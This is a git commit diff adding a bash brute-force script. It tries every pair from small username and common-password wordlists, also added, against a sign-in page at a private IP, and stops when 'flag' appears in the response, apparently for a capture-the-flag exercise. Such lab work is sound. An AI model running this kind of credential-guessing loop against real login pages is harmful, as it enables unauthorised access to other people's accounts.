add bruteforce script

This commit is contained in:
2025-04-10 15:45:18 +02:00
parent 2f82cbe950
commit 9ec8222529
3 changed files with 29 additions and 0 deletions

View File

@ -0,0 +1,16 @@
test_url() {
echo "test user $1, pass $2"
curl "http://10.12.248.148/?page=signin&username=$1&Login=Login&password=$2" 2> /dev/null | grep -i flag
if [ $? -eq 0 ]; then
echo "FOUND"
exit
fi
}
while read -r username; do
while read -r password; do
test_url "$username" "$password"
done < passwords.txt
done < usernames.txt

View File

@ -0,0 +1,7 @@
password
password1
qwerty
12345678
shadow
admin
111111

View File

@ -0,0 +1,6 @@
root
admin
test
guest
info
adm